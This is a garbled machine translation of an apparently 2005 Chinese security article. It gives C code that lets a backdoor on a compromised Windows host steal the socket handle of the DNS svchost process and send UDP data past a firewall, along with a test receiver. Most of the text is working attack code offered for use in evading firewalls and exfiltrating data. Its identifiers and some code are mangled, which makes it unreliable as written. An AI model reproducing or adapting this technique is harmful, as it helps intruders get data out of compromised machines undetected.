A new data transmission technology of penetrating firewall

Use this technical background: in the target host to the back door, you need to transfer data, at the same time the information is important, the action can not be too large. Other cases of "serious" do not recommend using this technique (I'll talk about why later). For some of the current firewall situation, if your process open a port (or even a new socket) must be blocked. On the contrary, it is clear to us that a process validated by a firewall will never be stopped when it transmits data. So my idea is simple: take the socket handle that allows data transfer in other processes to be used. The process is as follows: 1. Find the target process 2. Locate the socket handle 2. Use the DuplicateHandle () function to convert its socket to 3. The process of data transfer with the converted socket is very simple, but there are some problems in the actual implementation (after the discussion), and from the above implementation method can also see some unpleasant place: in the target process of the socket can not be TCP, Because the TCP handle is already connected to the outside, it can only be UDP. It is difficult to locate a stable process socket for different systems and processes. Look at these, you're a little frustrated, right, haha. Think again, in fact, we have a real through the "Golden Road" of Rome. We know that as long as a computer connected to the network, then there is a data transmission is certainly not intercepted, that is, DNS. Can you imagine the results of domain name parsing data being blocked? Hey, since this is never stopped, and it is a UDP transmission, we take his surgery. The following is an example of data transfer through direct control of the DNS process (in fact, Svchost.exe, but the application username is the receptacle SERVICE). There are many problems in programming, such as getting svchost not having permission to apply the username (but being able to manipulate the local SERVICE), stopping when the handle value is 0x2c getsockname, and so on. For specific solutions please look at the annotation section. Code:/*++made by zwell[email]zwell@sohu.com[/email]2005.4.12--*/#include #include #include #pragma comment (lib, "ws2_ ") #pragma comment (lib," wtsapi32 ") #define NT_SUCCESS (status) (NTSTATUS) (status) >=0) #define Status_info_length _mismatch ((NTSTATUS) 0xc0000004l) TypedeF LONG ntstatus;typedef struct _system_handle_information{ULONG ProcessID; Uchar Objecttypenumber; Uchar Flags; USHORT Handle; PVOID Object; Access_mask grantedaccess; System_handle_information, *psystem_handle_information;typedef ULONG (WINAPI *zwquerysysteminformation) (ULONG, PVOID, ULONG, Pulong); Zwquerysysteminformation zwquerysysteminformation = NULL; BOOL Locatentdllentry (void) {BOOL ret = FALSE; char ntdll_dll[] = "Ntdll.dll"; hmodule ntdll_dll = NULL; if ((Ntdll_dll = GetModuleHandle (ntdll_dll)) = = NULL) {printf ("GetModuleHandle () failed"); return (FALSE);} if ( ! (Zwquerysysteminformation = (zwquerysysteminformation) GetProcAddress (Ntdll_dll, "zwquerysysteminformation")) {goto locatentdllentry_exit;} ret = TRUE; Locatentdllentry_exit:if (FALSE = = ret) {printf ("GetProcAddress () failed");} Ntdll_dll = NULL; return (ret); /*++this routine is used to get a process ' s username from it ' sid--*/bool getusernamefromsid (psid pusersid, Char *szusern AME) {//SAnity Geom and default value if (Pusersid = NULL) return false; strcpy (szUserName, "?"); Sid_name_use SNU; TCHAR Szuser[_max_path]; DWORD chUser = _max_path; Pdword Pcchuser = &chUser; TCHAR Szdomain[_max_path]; DWORD chdomain = _max_path; Pdword Pcchdomain = &chDomain; Retrieve user name and domain name based on user ' s SID. if (:: LookupAccountSid (NULL, Pusersid, Szuser, Pcchuser, Szdomain, Pcchdomain, &snu)) {wsprintf (szUserName, "%s") Szuser); else {return false;} return true;} /*++this routine is used to get the DNS process ' s idhere, I use wtsenumerateprocesses to get process user Sid, and then GE t the process user name. Beacause as it's a "receptacle SERVICE", we Cann ' t use OpenProcessToken to catch the DNS process ' s token information,even if We super-delegates the privilege in catching the SYSTEM ' S.--*/dword getdnsprocessid () {Pwts_process_info pprocessinfo = NULL; DWORD processcount = 0; Char szusername[255]; DWORD Id =-1; if (Wtsenumerateprocesses (wts_current_server_handle, 0, 1, &pprocessinfo, &processcount)) {//dump per process description for (DWORD currentprocess = 0; Currentprocess < Processcount; currentprocess++) {if (strcmp (Pprocessinfo[currentprocess].pprocessname, "svchost.exe") = = 0) {Getusernamefromsid ( Pprocessinfo[currentprocess].pusersid, szUserName); if (strcmp (szUserName, "receptacle SERVICE") = = 0) {Id = pprocessinfo[currentprocess]. ProcessID; Break; }} wtsfreememory (Pprocessinfo); } return Id; /*++this doesn't ' t work as we know, sign...but you can use the routine for other useing...--*//*bool getprocessuserfromid (ch Ar *szaccountname, DWORD PID) {HANDLE hprocess = null, Haccesstoken = NULL; TCHAR infobuffer[1000], szdomainname[200]; Ptoken_user Ptokenuser = (ptoken_user) InfoBuffer; DWORD dwinfobuffersize,dwaccountsize = dwdomainsize = 200; Sid_name_use SNU; hprocess = OpenProcess (process_query_information, FALSE, PID); if (hprocess = = NULL) {printf ("openprocess wrong"); CloseHandle (hprocess); return false; }if (0 = = OpenProcessToken (hprocess,token_query,&haccesstoken)) {printf ("OpenProcessToken wrong:%08x") GetLastError ()); return false; GetTokenInformation (Haccesstoken,tokenuser,infobuffer, 1000, &dwinfobuffersize); LookupAccountSid (NULL, Ptokenuser->user.sid, Szaccountname, &dwaccountsize,szdomainname, &dwDomainSize, &SNU); if (hprocess) CloseHandle (hprocess); if (Haccesstoken) CloseHandle (Haccesstoken); return true; *//*++now, it is the most important stuff ... ^_^--*/socket getsocketfromid (DWORD PID) {NTSTATUS status; pvoid buf = NULL; ULONG size = 1; ULONG numofhandle = 0; ULONG i; Psystem_handle_information h_info = NULL; HANDLE sock = NULL; DWORD N; Buf=malloc (0x1000); if (buf = = null) {printf ("malloc wrong\n"); return NULL;} status = Zwquerysysteminformation (0x10, buf, 0x1000, &n); if (Status_info_length_mismatch = = STATUS) {free (BUF); Buf=malloc (n); if (buf = = NULL) {printf ("malloc wrong\n"); return NULL; Status = Zwquerysysteminformation (0x10, BUF, N, NULL); else {printf ("zwquerysysteminformation wrong\n"); return NULL;} Numofhandle = * (ulong*) buf; H_info = (psystem_handle_information) ((ULONG) buf+4); for (i = 0; i0)//If port > 0, then we can use it break; catch (...) {re-enters;} } if (buf!= NULL) {free (BUF);} return (SOCKET) sock;} /*++this is not required...--*/bool Enableprivilege (pcstr name) {HANDLE htoken; BOOL RV; Token_privileges Priv = {1, {0, 0, se_privilege_enabled}}; Lookupprivilegevalue (0, name, &priv. Privileges[0]. LUIDs); Priv. Privileges[0]. Attributes = se_privilege_enabled; OpenProcessToken (GetCurrentProcess (), token_adjust_privileges, &htoken); AdjustTokenPrivileges (Htoken, FALSE, &priv, sizeof priv, 0, 0); RV = GetLastError () = = ERROR_SUCCESS; CloseHandle (Htoken); return RV;} void Main () {wsadata wsadata; char testbuf[255]; SOCKET sock; Sockaddr_in recvaddr; int iresult = WSAStartup (Makeword (2,2), &wsadata); if (Iresult!= no_error) printf ("ERROR at WSAStartup () \ n"); if (! Locatentdllentry ()) return; if (! Enableprivilege (Se_debug_name)) {printf ("Enableprivilege wrong\n"); return; sock = Getsocketfromid (Getdnsprocessid ( )); if (sock==null) {printf ("Getsocketfromid wrong\n"); return;}//change there value ... recvaddr.sin_family = af_inet; Recvaddr.sin_port = htons (5555); RECVADDR.SIN_ADDR.S_ADDR = inet_addr ("127.0.0.1"); if (Socket_error = = sendto (sock, "Test", 5, 0, (SOCKADDR *) &recvaddr, sizeof (RECVADDR))) {printf ("SendTo wrong:%d\n", WSAGetLastError ()); else {printf (send ok ...) Have fun, right? ^_^ \ n "); } getchar (); WSACleanup (); return; [Copy to Clipboard] I had this idea a long time ago, but I haven't been there yet. In the above code, because to find the DNS process handle, and svchost.exe have more than one, so the user name to judge, is originally used OpenProcessToken, but how can not. So in another way, we use the WTSAPI32 library function. Test again with the following code: code:/*++udpreceiver--*/#include #include "winsock2.h" #pragma comment (lib, "ws2_32") void Main () {Wsadata Wsadata; SOCKET recvsocket;sockaddr_in recvaddr;int Port = 5555;char recvbuf[1024];int buflen = 1024;sockaddr_in SenderAddr;int Se Nderaddrsize = sizeof (SENDERADDR);//-----------------------------------------------//Initialize Winsockwsastartup (Makeword ( 2,2), &wsadata)//-----------------------------------------------/Create a receiver socket to receive Datagramsrecvsocket = socket (af_inet, SOCK_DGRAM, IPPROTO_UDP);//-----------------------------------------------// Bind the socket to any address and the specified port. recvaddr.sin_family = af_inet; Recvaddr.sin_port = htons (port); RECVADDR.SIN_ADDR.S_ADDR = htonl (Inaddr_any); Bind (Recvsocket, sockaddr *) &recvaddr, sizeof (RECVADDR));/------ -----------------------------------------//Call the Recvfrom function to receive datagrams//on the bound socket.printf ( "Receiving datagrams...\n") while (1) {recvfrom (Recvsocket, Recvbuf, Buflen, 0, (SOCKADDR *) &senderaddr, & Senderaddrsize); printf ("%s\n", recvbuf); -----------------------------------------------//Close the socket when finished receiving datagramsprintf (" Finished receiving. Closing socket.\n "); ClosesoCket (Recvsocket);//-----------------------------------------------/clean up and exit.printf ("exiting.\n"); WSACleanup (); [Copy to Clipboard] Test step: 1. Executes udpreceiver on a single machine. 2. Execute the first program on the machine where the firewall is installed. Zhao Zhaoyi#51cto.com TEL: (010) 68476636-8001 to force (0 Votes) Tempted (0 Votes) nonsense (0 Votes) Professional (0 Votes) The title party (0 Votes) passed (0 Votes) The original text: A new penetrating firewall data transmission technology return to network security home